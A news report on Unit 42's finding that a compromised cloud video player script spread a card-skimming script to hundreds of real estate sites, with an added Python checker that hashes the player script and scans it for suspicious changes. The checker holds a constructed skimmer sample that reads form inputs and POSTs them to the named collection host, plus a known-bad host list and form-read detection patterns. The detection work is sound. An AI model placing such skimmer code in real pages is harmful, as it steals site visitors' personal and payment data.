Attackers have used the software supply chain to access high-traffic websites. Now, researchers are warning that a cloud-based video hosting service is being used to launch web-skimming attacks against hundreds of real estate websites.

According to a blog post from Palo Alto Networks’ Unit 42, attackers used the service to carry out a supply chain attack and insert card-skimming malware into victims’ sites.
A web skimming attack is one in which a malicious script is inserted into a website to steal information from web forms. An online booking form, for example, may ask a site visitor for personal details and payment information; if the site is subject to skimming, hostile actors can intercept that data as it is entered.
Unit 42 wrote a blog post explaining the following:
We recently found a supply chain attack that takes advantage of a cloud video platform to distribute skimmer campaigns. In the case of the attacks described here, the attacker injected scraper JavaScript code into the video, so whenever others import the video, their websites are also embedded with scraper codes. We conclude that the attacker changed the static script in the hosted site by attaching the scraper code. On the next player update, the video platform re-entered the compromised file and submitted it with the affected player. From the code analysis, we know that the scraper snippet attempts to collect sensitive information of victims such as names, emails, and phone numbers and send it to a collection server, https://cdn-imgcloud[.]com/img, which has also been flagged as malicious in VirusTotal.
The researchers explained how the skimmer infects websites: when a user of the cloud platform creates a video player, they can customize it with their own JavaScript by uploading a .js file to be included in the player. In this scenario, the user had uploaded a script that could later be altered to include malicious content.
All of the affected sites were owned by the same parent firm, which was not named. The Unit 42 experts stated that they notified the organization and assisted it in removing the malware.
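The mechanism above (a customization script uploaded to the video platform, altered after upload, and re-ingested on the next player update) is exactly what a site owner can watch for. The Python below is an added example, not code from Unit 42 or from the video platform: it keeps a SHA-256 baseline of a third-party player script and scans a newly fetched version for the indicators the write-up describes, a read of form inputs combined with a request to a host that is not on the site's allowlist or is a known collection server. The script contents, hostnames and baseline are constructed for the example; only cdn-imgcloud[.]com comes from the page.

```python
"""Integrity and indicator check for a third-party player script.

Added example (not Unit 42's code). Models the defensive check a site owner
could run on the custom .js a cloud video player pulls in, so that a silent
change to that script is noticed before it reaches production pages.
"""
import hashlib
import re
from urllib.parse import urlparse

# Hosts the player script is expected to talk to. Constructed for this example.
ALLOWED_HOSTS = {
    "player.example-video-cloud.invalid",
    "cdn.example-video-cloud.invalid",
}

# Collection server named in the Unit 42 write-up (defanged on the page as
# cdn-imgcloud[.]com). Further entries would come from your own threat intel.
KNOWN_BAD_HOSTS = {"cdn-imgcloud.com"}

# Constructed sample: the benign customization script as originally uploaded.
BENIGN_PLAYER_JS = """
(function () {
  var p = document.getElementById('video-player');
  p.setAttribute('data-theme', 'realty-dark');
  fetch('https://cdn.example-video-cloud.invalid/theme.json');
})();
"""

# Constructed sample: the same script after a skimmer-like fragment is appended
# that reads form fields and posts them to the collection host from the page.
ALTERED_PLAYER_JS = BENIGN_PLAYER_JS + """
(function () {
  var f = {};
  document.querySelectorAll('input').forEach(function (i) { f[i.name] = i.value; });
  fetch('https://cdn-imgcloud.com/img', {method: 'POST', body: JSON.stringify(f)});
})();
"""

# Patterns that indicate the script enumerates form inputs (heuristic, not proof).
FORM_READ_PATTERNS = [
    r"querySelectorAll\(\s*['\"]input",
    r"getElementsByTagName\(\s*['\"]input",
    r"document\.forms",
]


def sha256_hex(text: str) -> str:
    """Content hash used for the baseline comparison."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def extract_hosts(script: str) -> set:
    """Hostnames of every absolute http(s) URL literal found in the script."""
    urls = re.findall(r"https?://[^\s'\"()]+", script)
    return {urlparse(u).hostname for u in urls if urlparse(u).hostname}


def find_indicators(script: str) -> list:
    """Human-readable findings: unlisted/known-bad hosts and form reads."""
    findings = []
    hosts = extract_hosts(script)
    for host in sorted(hosts):
        if host in KNOWN_BAD_HOSTS:
            findings.append(f"contacts known collection server {host}")
        elif host not in ALLOWED_HOSTS:
            findings.append(f"contacts host outside allowlist {host}")
    reads_forms = any(re.search(p, script) for p in FORM_READ_PATTERNS)
    if reads_forms and any(h not in ALLOWED_HOSTS for h in hosts):
        findings.append("reads form inputs and talks to an unlisted host")
    return findings


def check_script(name: str, content: str, baseline: dict) -> dict:
    """Compare a fetched script against the baseline and scan it for indicators.

    verdict: "ok" (hash matches, nothing suspicious), "review" (hash drifted,
    script is unbaselined, or indicators alone), "block" (drift + indicators).
    """
    expected = baseline.get(name)
    known = expected is not None
    changed = known and expected != sha256_hex(content)
    indicators = find_indicators(content)
    if indicators and changed:
        verdict = "block"
    elif indicators or changed or not known:
        verdict = "review"
    else:
        verdict = "ok"
    return {"name": name, "changed": changed, "indicators": indicators, "verdict": verdict}


# Baseline recorded when the script was first vetted (constructed here).
BASELINE = {"player-custom.js": sha256_hex(BENIGN_PLAYER_JS)}

if __name__ == "__main__":
    for label, body in (("original", BENIGN_PLAYER_JS), ("after update", ALTERED_PLAYER_JS)):
        print(label, check_script("player-custom.js", body, BASELINE))
```

Run this against each script the player embeds whenever the platform ships a player update; a hash change on its own is only "review" because vendors do legitimately update scripts, but a hash change together with a new outbound host and a form read is the combination the write-up describes and is worth blocking until a person has looked at the diff.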
Researchers from @Unit42_Intel reveal how web skimming attacks on hundreds of websites were deployed via a backdoored cloud video hosting service https://t.co/KLyNiyi4xo
— The Daily Swig (@DailySwig) January 5, 2022
Trevor Morgan, Product Manager at Comforte AG, had the following to say:
As these types of attacks continue to evolve in terms of sophistication and intelligence, companies need to stay focused on the essentials: developing a defensive strategy that includes more than just perimeter-based security, so don’t assume that cloud-based services are inherently secure without proper due diligence, prioritizing emerging data-centric security methods such as format-preserving coding and encryption, which can apply protection directly to sensitive data pursued by threat actors. Tokenizing data once it enters your organization’s workflow means that business applications and users can continue to work with this information in a protected state, but more importantly, if the wrong people get it, either unintentionally or through coordinated attacks like this, sensitive information remains opaque so that threat actors cannot take advantage of it for their gain.
